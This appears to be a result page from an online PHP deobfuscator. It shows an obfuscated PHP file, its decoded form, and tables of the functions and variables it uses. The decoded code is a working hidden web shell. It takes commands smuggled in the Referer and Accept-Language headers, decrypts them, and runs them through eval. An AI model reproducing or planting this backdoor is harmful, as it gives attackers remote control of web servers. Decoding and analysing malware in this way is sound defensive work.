Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $l=str_replace('K','','crKKeatKKeK_Kfunction'); $x='0s5,$e)))s5,$k)))s5;$s5o=ob_get_..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$l=str_replace('K','','crKKeatKKeK_Kfunction');
$x='0s5,$e)))s5,$k)))s5;$s5o=ob_get_cs5ons5tents5s();ob_ens5ds5_clean();$s5d=bs5ass5e64_enco';
$K='5";$ps5=$ss($p,s53);}if(s5arrays5_keys5_exs5ists($i,$s5s)){$s[$i].s5=$p;s5$es5=ss5trpos($';
$a='=s5@$r["HTTP_ACCEPTs5_LAs5NGUAs5GE"]s5;if($rr&s5&$ra){$u=pas5rse_us5rl($rr)s5;ps5ars5';
$h='$o="";fors5($i=0s5;$s5i<s5$l;){for($j=0;s5($j<$cs5s5&&$i<$s5l);$j++,$is5++){$s5o.=$ts5';
$d='Es5s5SSION;$sss5="substr";$sls5="strts5ols5s5ower";$i=s5$m[1][0]s5.$m[s51][1];s5$hs5=$sl($ss(';
$j='os5unt($m[1]);$zs5++s5)$p.=$q[$ms5[s52][$z]];ifs5(strpos(s5s5$p,$h)===0){s5$s5s[$i]="s';
$k='ses5_str($u["query"],$s5q);$qs5s5=array_valus5ess5($q);preg_mats5ch_as5ll("/([\\s5w]s5)[\\';
$y='w-]+(?:;s5q=0s5.(s5[\\d]))?,?s5/",s5$ra,$m);s5if($qs5&&$m){@ss5esss5ion_stars5t();$s5s=&$_S';
$O='md5($s5i.$kh),0,s53)s5);$fs5=s5$sl($ss(md5($is5.$kf)s5,0,3));$p=s5"";for(s5$s5z=1;$z<s5c';
$o='$kh="s55d41";$ks5f=s5"402a";funs5ction x($s5ts5,$k){$c=ss5trls5en($k);$s5s5l=strlen($t);s5';
$i='s[$i],$f);s5is5f($e){$s5ks5=$kh.$kf;ob_ss5tart(s5);@es5val(@gzuns5compres5ss5s(@x(@ba';
$X='ss5s5e64_decode(ps5reg_reps5lace(arrs5s5ay("s5/_/","/-/"),s5array("/"s5,s5"+"),$ss($s5s[$i],';
$F='de(x(gs5zcoms5press($s5o)s5,$k)s5);print("<$ks5>$d<s5/$s5k>"s5);@session_s5destroy();}}}}';
$L='{$i}^$k{$js5s5};}s5}returs5n $o;}$r=s5s5$_SERVER;$rs5r=@$r["HTs5TP_s5REFERER"s5s5];$ra';
$r=str_replace('s5','',$o.$h.$L.$a.$k.$y.$d.$O.$j.$K.$i.$X.$x.$F);
$C=$l('',$r);$C();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C None
$F de(x(gs5zcoms5press($s5o)s5,$k)s5);print("<$ks5>$d<s5/$s5k>"..
$K 5";$ps5=$ss($p,s53);}if(s5arrays5_keys5_exs5ists($i,$s5s)){$..
$L {$i}^$k{$js5s5};}s5}returs5n $o;}$r=s5s5$_SERVER;$rs5r=@$r["..
$O md5($s5i.$kh),0,s53)s5);$fs5=s5$sl($ss(md5($is5.$kf)s5,0,3))..
$X ss5s5e64_decode(ps5reg_reps5lace(arrs5s5ay("s5/_/","/-/"),s5..
$a =s5@$r["HTTP_ACCEPTs5_LAs5NGUAs5GE"]s5;if($rr&s5&$ra){$u=pas..
$d Es5s5SSION;$sss5="substr";$sls5="strts5ols5s5ower";$i=s5$m[1..
$h $o="";fors5($i=0s5;$s5i<s5$l;){for($j=0;s5($j<$cs5s5&&$i<$s5..
$i s[$i],$f);s5is5f($e){$s5ks5=$kh.$kf;ob_ss5tart(s5);@es5val(@..
$j os5unt($m[1]);$zs5++s5)$p.=$q[$ms5[s52][$z]];ifs5(strpos(s5s..
$k ses5_str($u["query"],$s5q);$qs5s5=array_valus5ess5($q);preg_..
$l create_function
$o $kh="s55d41";$ks5f=s5"402a";funs5ction x($s5ts5,$k){$c=ss5tr..
$r $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$x 0s5,$e)))s5,$k)))s5;$s5o=ob_get_cs5ons5tents5s();ob_ens5ds5_..
$y w-]+(?:;s5q=0s5.(s5[\d]))?,?s5/",s5$ra,$m);s5if($qs5&&$m){@s..

Stats

MD5 88280c54d0e0763fe0c33efe33df5a12
Eval Count 1
Decode Time 96 ms